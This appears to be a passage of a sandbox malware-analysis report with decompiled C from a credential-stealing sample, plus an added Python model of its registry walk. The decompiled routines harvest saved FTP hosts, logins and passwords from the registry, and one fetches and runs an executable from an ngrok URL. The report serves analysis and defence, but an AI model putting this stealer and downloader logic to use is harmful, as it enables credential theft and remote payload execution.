                                                                    						_v16 = 0x7ff; // size of the _v2064 name buffer
                                                                    						_t32 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0); // subkey index _v12; non-zero return (ERROR_NO_MORE_ITEMS) ends the loop
                                                                    						_t33 = _t32;
                                                                    						if(_t32 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401E4C( &_v2064, E00401DF8(_t33, _a8, "\\"),  &_v2064); // child path = _a8 + "\\" + subkey name
                                                                    						E004059A4(_a4, _v2068); // recurse into the child; no depth limit
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t29;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 00405A44
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00405A74
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405AC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                                                    • API String ID: 1332880857-44262141
                                                                    • Opcode ID: fbe6a1297dfefc1fd067c59828427cc079b2c712672dcae10ee997c1b37d76b5
                                                                    • Instruction ID: ef9fb06cd34c7ccf76aa40754f09ac5043f5b2b84b8ceac9111509753786a159
                                                                    • Opcode Fuzzy Hash: fbe6a1297dfefc1fd067c59828427cc079b2c712672dcae10ee997c1b37d76b5
                                                                    • Instruction Fuzzy Hash: 51218131640A08FADF11AB50CC02FDD3B75AB84B05F20C167B515740E1DABD5AD0AF8C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
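
The routine above (E004059A4) is the sample's FTP-credential walk: open the key named by its second argument under the root HKEY stored at 0x414869, query three alternative value-name layouts, then enumerate every subkey with RegEnumKeyExA and recurse into "<path>\<subkey>" with no depth limit. The Python below is an added example written for this page, not the sample's code and not part of the Joe Sandbox report. It models that traversal over a constructed in-memory key tree so it runs offline; the product name "ExampleFtpClient" and the key layout are invented, and the per-key harvesting step (E00405844, whose body is not shown on the page) is modelled as an assumption: record the six values whenever the host member of a layout is present. The 0xbeef0013/0xbeef0014 tags the sample passes along are not modelled.

```python
"""Model of the recursive registry walk decompiled as E004059A4.

Added example; not the sample's code. Runs over a constructed
in-memory tree. E00405844 is not on the page, so `harvest` below is
an ASSUMED model: report a record for each value layout whose host
value exists (so a profile without a saved password still shows).
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# The three value-name tuples the sample hands to E00405844, in the
# order (password, host, user, port, remote path, server type).
VALUE_SETS = [
    ("Pass", "Host", "User", "Port", "Remote Dir", "Server Type"),
    ("Server.Pass", "Server.Host", "Server.User", "Server.Port",
     "Path", "ServerType"),
    ("Last Server Pass", "Last Server Host", "Last Server User",
     "Last Server Port", "Last Server Path", "Last Server Type"),
]

Hit = Tuple[str, Dict[str, Optional[str]]]


@dataclass
class Key:
    """Stand-in for one registry key: its values and its named subkeys."""
    values: Dict[str, str] = field(default_factory=dict)
    subkeys: Dict[str, "Key"] = field(default_factory=dict)


def open_key(root: Key, path: str) -> Optional[Key]:
    """RegOpenKeyA(root, path): resolve a backslash path, None if absent."""
    node = root
    for part in path.split("\\"):
        if part:
            node = node.subkeys.get(part)
            if node is None:
                return None
    return node


def harvest(key: Key, path: str, hits: List[Hit]) -> None:
    """ASSUMED model of E00405844: one record per layout whose host
    value is present on this key."""
    for pw, host, user, port, rpath, stype in VALUE_SETS:
        if host in key.values:
            v = key.values.get
            hits.append((path, {"host": v(host), "user": v(user),
                                "pass": v(pw), "port": v(port),
                                "path": v(rpath), "type": v(stype)}))


def walk(root: Key, path: str, hits: Optional[List[Hit]] = None) -> List[Hit]:
    """E004059A4: harvest `path`, then enumerate every subkey (the
    RegEnumKeyExA loop) and recurse into path + "\\" + name.
    No depth limit: the whole subtree under the start key is visited."""
    if hits is None:
        hits = []
    key = open_key(root, path)
    if key is None:            # RegOpenKeyA failed: nothing to enumerate
        return hits
    harvest(key, path, hits)
    for name in key.subkeys:   # index 0.. until ERROR_NO_MORE_ITEMS
        walk(root, path + "\\" + name, hits)
    return hits


# Constructed HKCU subtree; "ExampleFtpClient" is a hypothetical product.
SAMPLE_HKCU = Key(subkeys={"Software": Key(subkeys={"ExampleFtpClient": Key(
    values={"Version": "1.0"},
    subkeys={
        "Sites": Key(subkeys={
            "prod": Key(values={"Host": "ftp.example.test", "User": "deploy",
                                "Pass": "hunter2", "Port": "21",
                                "Remote Dir": "/var/www",
                                "Server Type": "FTP"}),
            # second layout, password never saved
            "staging": Key(values={"Server.Host": "10.0.0.5",
                                   "Server.User": "qa",
                                   "Server.Port": "2121"}),
        }),
        # third layout: "last used server" remembered beside the sites
        "Recent": Key(values={"Last Server Host": "ftp.old.test",
                              "Last Server User": "root",
                              "Last Server Pass": "toor"}),
    })})})


def exposed_credentials(root: Key = SAMPLE_HKCU,
                        start: str = "Software\\ExampleFtpClient") -> List[Hit]:
    """Everything the walk would have collected from this tree."""
    return walk(root, start)


if __name__ == "__main__":
    for path, rec in exposed_credentials():
        print(path, rec)
```

On a live Windows host the same traversal maps onto the winreg module (OpenKey, EnumKey, QueryValueEx) rooted at HKEY_CURRENT_USER, which is the value 0x80000001 that E004105D6 stores at 0x414869; running it against a suspect profile tells you which saved FTP entries the sample could have read, including ones with no stored password, since only the host value has to exist for a layout to match.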

                                                                    C-Code - Quality: 83%
                                                                    			E004020B9(void* __ebx, int* __ecx) {
                                                                    				void* _v8;
                                                                    				char _v4104;
                                                                    				int _v4108;
                                                                    				int _v4112;
                                                                    				char _v4116;
                                                                    				char _v4120;
                                                                    				int _v4124;
                                                                    				void* _v4128;
                                                                    				intOrPtr _v4132;
                                                                    				void* __edi;
                                                                    				void* __ebp;
                                                                    				long _t56;
                                                                    				void* _t60;
                                                                    				void* _t61;
                                                                    				void* _t63;
                                                                    				void* _t65;
                                                                    				void* _t68;
                                                                    				void* _t69;
                                                                    				long _t74;
                                                                    				void* _t78;
                                                                    				intOrPtr _t81;
                                                                    				void* _t83;
                                                                    				void* _t84;
                                                                    				void* _t88;
                                                                    				void* _t89;
                                                                    				char* _t90;
                                                                    				void* _t98;
                                                                    				void* _t103;
                                                                    				int* _t104;
                                                                    				int _t106;
                                                                    				void* _t108;
                                                                    				void* _t109;
                                                                    				void* _t112;
                                                                    				void* _t115;
                                                                    				void* _t116;
                                                                    
                                                                    				_t104 = __ecx;
                                                                    				_t103 = __ebx;
                                                                    				if( *0x4147ed != 0) {
                                                                    					E004018B8( *0x4147ed);
                                                                    					 *0x4147ed = 0;
                                                                    				}
                                                                    				_t119 =  *0x4147f1;
                                                                    				if( *0x4147f1 != 0) {
                                                                    					E004018B8( *0x4147f1);
                                                                    					 *0x4147f1 = 0;
                                                                    				}
                                                                    				E00401000( &_v4116, _t104, _t119,  &_v4116); // executed
                                                                    				E00401000( &_v4120, _t104, _t119,  &_v4120);
                                                                    				_t56 = RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v8); // executed; 0x80000002 = HKEY_LOCAL_MACHINE, the installed-software list
                                                                    				if(_t56 != 0) {
                                                                    					L19:
                                                                    					E00401569(_v4116, 0);
                                                                    					E00401569(_v4120, 0);
                                                                    					_t60 =  &_v4128;
                                                                    					_push(_t60);
                                                                    					_push(_v4116);
                                                                    					L00410790();
                                                                    					__eflags = _t60;
                                                                    					if(__eflags >= 0) {
                                                                    						_v4124 = E00401082(_t60, _t108, __eflags, _v4116);
                                                                    						_t68 = E004018CF(_v4124); // executed
                                                                    						 *0x4147ed = _t68;
                                                                    						GlobalFix(_v4128);
                                                                    						_t69 = _t68;
                                                                    						__eflags = _t69;
                                                                    						if(_t69 != 0) {
                                                                    							_t106 = _v4124;
                                                                    							_t115 = _t69;
                                                                    							_t112 =  *0x4147ed; // 0x640b38
                                                                    							memcpy(_t112, _t115, _t106);
                                                                    							_t116 = _t116 + 0xc;
                                                                    							_t108 = _t115 + _t106 + _t106;
                                                                    							_t104 = 0;
                                                                    							GlobalUnWire(_v4128);
                                                                    						}
                                                                    					}
                                                                    					_t61 =  &_v4128;
                                                                    					_push(_t61);
                                                                    					_push(_v4120);
                                                                    					L00410790();
                                                                    					__eflags = _t61;
                                                                    					if(__eflags >= 0) {
                                                                    						_v4124 = E00401082(_t61, _t108, __eflags, _v4120);
                                                                    						_t65 = E004018CF(_v4124); // executed
                                                                    						 *0x4147f1 = _t65;
                                                                    						GlobalFix(_v4128);
                                                                    						_t61 = _t65;
                                                                    						__eflags = _t61;
                                                                    						if(__eflags != 0) {
                                                                    							_t109 =  *0x4147f1; // 0x645e80
                                                                    							memcpy(_t109, _t61, _v4124);
                                                                    							_t104 = 0;
                                                                    							_t61 = GlobalUnWire(_v4128);
                                                                    						}
                                                                    					}
                                                                    					_t63 = E00401021(E00401021(_t61, _t103, _t104, _t107, __eflags, _v4116), _t103, _t104, _t107, __eflags, _v4120); // executed
                                                                    					return _t63;
                                                                    				}
                                                                    				_v4112 = 0;
                                                                    				while(1) {
                                                                    					_v4108 = 0xfff;
                                                                    					_t74 = RegEnumKeyExA(_v8, _v4112,  &_v4104,  &_v4108, 0, 0, 0, 0); // executed
                                                                    					_t75 = _t74;
                                                                    					if(_t74 != 0) {
                                                                    						break;
                                                                    					}
                                                                    					_t78 = E00401DF8(_t75, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "\\");
                                                                    					if(_t78 != 0) {
                                                                    						_t107 = _t78;
                                                                    						_t81 = E00401E4C( &_v4104, _t78,  &_v4104);
                                                                    						if(_t81 != 0) {
                                                                    							_v4132 = _t81;
                                                                    							_t83 = E00401D71(0x80000002, _v4132, "UninstallString",  &_v4124); // executed
                                                                    							_t84 = _t83;
                                                                    							if(_t84 != 0 && _t84 > 1) {
                                                                    								_push(_t84);
                                                                    								E0040157E(_v4116, _t84, _v4124); // executed
                                                                    								_t88 = E00401D71(0x80000002, _v4132, "DisplayName",  &_v4124); // executed
                                                                    								_t89 = _t88;
                                                                    								if(_t89 == 0 || _v4124 <= 1) {
                                                                    									_t90 =  &_v4104;
                                                                    									_push(_t90);
                                                                    									L0041066A();
                                                                    									__eflags = _t90 + 1;
                                                                    									E0040157E(_v4120,  &_v4104, _t90 + 1);
                                                                    								} else {
                                                                    									_push(_t89);
                                                                    									_push(_t89);
                                                                    									_push( &_v4104);
                                                                    									L0041066A();
                                                                    									E0040157E(_v4120,  &_v4104,  &_v4104);
                                                                    									_pop(_t98);
                                                                    									E0040157E(_v4120, _t98, _v4124);
                                                                    									E004018B8();
                                                                    								}
                                                                    								E004018B8();
                                                                    							}
                                                                    							E004018B8(_v4132);
                                                                    						}
                                                                    					}
                                                                    					_v4112 = _v4112 + 1;
                                                                    				}
                                                                    				RegCloseKey(_v8);
                                                                    				goto L19;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402126
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00402166
                                                                    • lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402219
                                                                    • lstrlen.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402252
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402289
                                                                    • 73D83240.OLE32(?,?,?,?), ref: 004022B5
                                                                    • GlobalFix.KERNEL32 ref: 004022E5
                                                                    • GlobalUnWire.KERNEL32 ref: 00402304
                                                                    • 73D83240.OLE32(?,?,?,?,?,?), ref: 00402316
                                                                    • GlobalFix.KERNEL32 ref: 00402346
                                                                    • GlobalUnWire.KERNEL32 ref: 00402365
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$D83240LocalWirelstrlen$AllocCloseEnumFreeOpen
                                                                    • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                    • API String ID: 3111079941-981893429
                                                                    • Opcode ID: 10598e04fb56fc1a18f9fced754db3a550e9482cf9d95f37a8c67be40503c877
                                                                    • Instruction ID: e8800f7e17a62db29e95db71b44d800467aa85f06a3210c5d1cd602f7ee17b8c
                                                                    • Opcode Fuzzy Hash: 10598e04fb56fc1a18f9fced754db3a550e9482cf9d95f37a8c67be40503c877
                                                                    • Instruction Fuzzy Hash: 54614A35900168BADF31AB61CD46FE97679EB44308F1040FAB588B11E1D7F89ED4AE68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E0040FE88(void* __ebx, void* __ecx) {
                                                                    				void* _t33;
                                                                    				long _t49;
                                                                    				char* _t60;
                                                                    				void* _t62;
                                                                    				void* _t67;
                                                                    				void* _t68;
                                                                    				void* _t69;
                                                                    				intOrPtr* _t71;
                                                                    				intOrPtr _t74;
                                                                    				void* _t75;
                                                                    				void* _t77;
                                                                    
                                                                    				_t69 = __ecx;
                                                                    				_t68 = __ebx;
                                                                    				_t71 = "http://63e2e5290bcf.ngrok.io/dump.exe";
                                                                    				if( *_t71 == 0) {
                                                                    					L18:
                                                                    					return 0;
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				do {
                                                                    					L1:
                                                                    					_t33 = E00403D6D(_t71, _t75 - 0x10c); // executed
                                                                    					if(_t33 != 0 &&  *((intOrPtr*)(_t75 - 0x10c)) != 0) {
                                                                    						_t36 = E00401788(_t69, _t71,  *((intOrPtr*)(_t75 - 0x10c)), _t75 - 0x158);
                                                                    						_t74 = 0;
                                                                    						 *((intOrPtr*)(_t75 - 0x15c)) = 0;
                                                                    						while(1) {
                                                                    							_t82 = _t74 - 0x10;
                                                                    							if(_t74 >= 0x10) {
                                                                    								break;
                                                                    							}
                                                                    							wsprintfA(_t75 - 0x13e, "%02X",  *[ss:esi+ebp-0x158] & 0x000000ff);
                                                                    							_t77 = _t77 + 0xc;
                                                                    							 *((intOrPtr*)(_t75 - 0x15c)) = E00401E4C(_t75 - 0x13e,  *((intOrPtr*)(_t75 - 0x15c)), _t75 - 0x13e);
                                                                    							_t74 = _t74 + 1;
                                                                    							__eflags = _t74;
                                                                    						}
                                                                    						_push( *((intOrPtr*)(_t75 - 0x10c)));
                                                                    						E004012BB(_t36, _t82);
                                                                    						 *(_t75 - 0x148) = 0;
                                                                    						if(E00401133(_t75 - 0x148, _t82,  *((intOrPtr*)(_t75 - 0x10c)), _t75 - 0x148, 2) != 0 &&  *(_t75 - 0x148) == 0x5a4d) {
                                                                    							_t49 = GetTempPathA(0x104, _t75 - 0x105);
                                                                    							if(_t49 != 0 && _t49 <= 0x104) {
                                                                    								wsprintfA(_t75 - 0x13e, "%d.exe", GetTickCount());
                                                                    								_t77 = _t77 + 0xc;
                                                                    								CreateDirectoryA(_t75 - 0x105, 0);
                                                                    								if(E004025A9(_t75 - 0x105) != 0) {
                                                                    									_t60 = E00401DF8(_t75 - 0x105, _t75 - 0x105, _t75 - 0x13e);
                                                                    								} else {
                                                                    									_t67 = E00401DF8(_t75 - 0x105, _t75 - 0x105, "\\");
                                                                    									_t70 = _t75 - 0x13e;
                                                                    									_t60 = E00401E4C(_t67, _t67, _t75 - 0x13e);
                                                                    								}
                                                                    								 *(_t75 - 0x144) = _t60;
                                                                    								_t62 = E00401463(_t60,  *((intOrPtr*)(_t75 - 0x10c)),  *(_t75 - 0x144));
                                                                    								_t88 = _t62;
                                                                    								if(_t62 != 0) {
                                                                    									_push("true");
                                                                    									L0041066A();
                                                                    									E004026DD( *((intOrPtr*)(_t75 - 0x15c)), "true", _t62);
                                                                    									ShellExecuteA(0, "open",  *(_t75 - 0x144), 0, 0, 1);
                                                                    								}
                                                                    								E004018B8( *(_t75 - 0x144));
                                                                    							}
                                                                    						}
                                                                    						E00401021(E004018B8( *((intOrPtr*)(_t75 - 0x15c))), _t68, _t69, _t70, _t88,  *((intOrPtr*)(_t75 - 0x10c)));
                                                                    					}
                                                                    					asm("cld");
                                                                    					_t69 = 0xffffffff;
                                                                    					asm("repne scasb");
                                                                    				} while ( *_t71 != 0);
                                                                    				goto L18;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 00401788: 73D83240.OLE32(?,?), ref: 00401795
                                                                      • Part of subcall function 00401788: GlobalFix.KERNEL32 ref: 004017AC
                                                                      • Part of subcall function 00401788: GlobalUnWire.KERNEL32 ref: 004017C4
                                                                    • wsprintfA.USER32 ref: 0040FEEA
                                                                    • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FF5D
                                                                    • GetTickCount.KERNEL32 ref: 0040FF75
                                                                    • wsprintfA.USER32 ref: 0040FF87
                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FF98
                                                                    • lstrlen.KERNEL32(true,?,00000000), ref: 00410000
                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00410029
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                      • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                      • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: lstrlen$Globalwsprintf$CountCreateD83240DirectoryExecutePathShellTempTickWirelstrcatlstrcpy
                                                                    • String ID: %02X$%d.exe$MZ$http://63e2e5290bcf.ngrok.io/dump.exe$open$true
                                                                    • API String ID: 2225561190-3423104401
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E00402C01(int* __eax, void* __eflags) {
                                                                    				void* _v32;
                                                                    				long _v36;
                                                                    				void* _v40;
                                                                    				void* _v44;
                                                                    				int _t23;
                                                                    				int _t27;
                                                                    				long _t30;
                                                                    				int _t33;
                                                                    				int _t39;
                                                                    				void* _t42;
                                                                    				int _t44;
                                                                    
                                                                    				_push(_t42);
                                                                    				_push(0x402c16);
                                                                    				asm("clc");
                                                                    				if(__eflags < 0) {
                                                                    					 *((intOrPtr*)(_t42 + 0x414b273d)) =  *((intOrPtr*)(_t42 + 0x414b273d)) + 1;
                                                                    					 *__eax = __eax +  *__eax;
                                                                    					__eflags =  *__eax;
                                                                    					if( *__eax == 0) {
                                                                    						L5:
                                                                    						__eflags = 0;
                                                                    						return 0;
                                                                    					} else {
                                                                    						__eflags =  *0x414b2f;
                                                                    						if( *0x414b2f == 0) {
                                                                    							goto L5;
                                                                    						} else {
                                                                    							__eflags =  *0x414b33;
                                                                    							if( *0x414b33 != 0) {
                                                                    								_t44 = 0;
                                                                    								_t23 = OpenProcessToken(GetCurrentProcess(), 8,  &_v32);
                                                                    								__eflags = _t23;
                                                                    								if(_t23 != 0) {
                                                                    									_v36 = 0;
                                                                    									_t27 = GetTokenInformation(_v32, 1, 0, 0,  &_v36); // executed
                                                                    									__eflags = _t27;
                                                                    									if(_t27 == 0) {
                                                                    										_t30 = GetLastError();
                                                                    										__eflags = _t30 - 0x7a;
                                                                    										if(_t30 == 0x7a) {
                                                                    											__eflags = _v36;
                                                                    											if(_v36 != 0) {
                                                                    												_v40 = E004018CF(_v36);
                                                                    												_t33 = GetTokenInformation(_v32, 1, _v40, _v36,  &_v36); // executed
                                                                    												__eflags = _t33;
                                                                    												if(_t33 != 0) {
                                                                    													_t39 =  *0x414b33( *_v40,  &_v44);
                                                                    													__eflags = _t39;
                                                                    													if(_t39 != 0) {
                                                                    														_push("S-1-5-18");
                                                                    														_push(_v44);
                                                                    														L004106EE(); // executed
                                                                    														__eflags = _t39;
                                                                    														if(_t39 == 0) {
                                                                    															_t44 = 1;
                                                                    															__eflags = 1;
                                                                    														}
                                                                    														LocalFree(_v44);
                                                                    													}
                                                                    												}
                                                                    												E004018B8(_v40);
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									CloseHandle(_v32);
                                                                    								}
                                                                    								return _t44;
                                                                    							} else {
                                                                    								goto L5;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
                                                                    			}


                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • String ID: S-1-5-18
                                                                    • API String ID: 0-4289277601
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040668F(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				int* _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				intOrPtr _v2088;
                                                                    				char _v2092;
                                                                    				int* _v2096;
                                                                    				char _v2100;
                                                                    				char _v2104;
                                                                    				long _t62;
                                                                    				long _t63;
                                                                    				long _t66;
                                                                    				intOrPtr* _t78;
                                                                    				intOrPtr* _t82;
                                                                    
                                                                    				_t62 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
                                                                    				_t63 = _t62;
                                                                    				if(_t63 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t66 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t67 = _t66;
                                                                    						if(_t66 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401E4C( &_v2064, E00401DF8(_t67, _a8, "\\"),  &_v2064);
                                                                    						_v2080 = E00401D71( *0x414869, _v2068, "Password",  &_v2104);
                                                                    						_v2072 = E00401D71( *0x414869, _v2068, "Host", 0);
                                                                    						_v2076 = E00401D71( *0x414869, _v2068, "Login", 0);
                                                                    						_v2084 = E00401D71( *0x414869, _v2068, "InitialPath", 0);
                                                                    						_t78 = E00401D71( *0x414869, _v2068, "Port",  &_v2092);
                                                                    						if(_t78 == 0 || _v2092 != 4) {
                                                                    							_v2088 = 0x15;
                                                                    						} else {
                                                                    							 *_t24 =  *_t78;
                                                                    						}
                                                                    						E004018B8(_t78);
                                                                    						_t82 = E00401D71( *0x414869, _v2068, "PasswordType",  &_v2100);
                                                                    						if(_t82 == 0 || _v2100 != 4) {
                                                                    							_v2096 = 0;
                                                                    						} else {
                                                                    							 *_t29 =  *_t82;
                                                                    						}
                                                                    						E004018B8(_t82);
                                                                    						if(_v2080 != 0 && _v2096 == 2 && (E004043DC(_v2080,  &_v2104, 0) == 0 || _v2104 == 0)) {
                                                                    							E004018B8(_v2080);
                                                                    							_v2080 = 0;
                                                                    						}
                                                                    						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E00401569(_a4, 0xbeef0002), _a4, _v2072), _a4, _v2076);
                                                                    							E0040159F(_a4, _v2080, _v2104);
                                                                    							E004015CB(E00401569(_a4, _v2088), _a4, _v2084);
                                                                    						}
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2084);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t63;
                                                                    			}


                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 004066A5
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 004066D9
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040690C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                                                    • API String ID: 1332880857-4069465341
                                                                    • Opcode ID: 750eeaa563015a51f2f81a185dd3376f511c128af8215887898a7e814ea9f4d0
                                                                    • Instruction ID: ddbf5386c557692e0a2d872b86364cc9d1953b440620d6587ff0ea321d438c9c
                                                                    • Opcode Fuzzy Hash: 750eeaa563015a51f2f81a185dd3376f511c128af8215887898a7e814ea9f4d0
                                                                    • Instruction Fuzzy Hash: 9551E43194011CEADF217B51CC02BED7AB9BF44308F10C5BAA549750B1DB7A5BA5DF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040D072(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				char _v16;
                                                                    				int _v20;
                                                                    				char _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				intOrPtr _v2088;
                                                                    				intOrPtr _v2092;
                                                                    				char _v2096;
                                                                    				intOrPtr _v2100;
                                                                    				long _t68;
                                                                    				long _t69;
                                                                    				long _t72;
                                                                    				intOrPtr* _t84;
                                                                    				void* _t108;
                                                                    
                                                                    				_t108 = __ecx;
                                                                    				_t68 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t69 = _t68;
                                                                    				if(_t69 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v20 = 0x7ff;
                                                                    						_t72 = RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v20, 0, 0, 0, 0);
                                                                    						_t73 = _t72;
                                                                    						if(_t72 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2072 = E00401DF8( &_v2068, E00401DF8(_t73, _a12, "\\"),  &_v2068);
                                                                    						E004018B8(_t74);
                                                                    						_v2092 = E00401D71(_a8, _v2072, "Password",  &_v16);
                                                                    						_v2076 = E00401D71(_a8, _v2072, "ServerName", 0);
                                                                    						_v2080 = E00401D71(_a8, _v2072, "UserID", 0);
                                                                    						_t84 = E00401D71(_a8, _v2072, "PortNumber",  &_v2096);
                                                                    						if(_t84 == 0 || _v2096 != 4) {
                                                                    							_t85 = _t84;
                                                                    							if(_t84 != 0) {
                                                                    								E004018B8(_t85);
                                                                    							}
                                                                    							_v2084 = 0x15;
                                                                    						} else {
                                                                    							 *_t27 =  *_t84;
                                                                    							E004018B8(_t84);
                                                                    						}
                                                                    						_v2088 = E00401D71(_a8, _v2072, "InitialDirectory", 0);
                                                                    						_v2100 = E00401D71(_a8, _v2072, "ServerType", 0);
                                                                    						if(_v2092 != 0 && E004043DC(_v2092,  &_v16, 0x416859) != 0 && _v16 != 0 && _v2080 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v2076), _a4, _v2080);
                                                                    							E0040159F(_a4, _v2092, _v16);
                                                                    							E004015CB(E004015CB(E00401569(_a4, _v2084), _a4, _v2088), _a4, _v2100);
                                                                    						}
                                                                    						E004018B8(_v2092);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2088);
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2100);
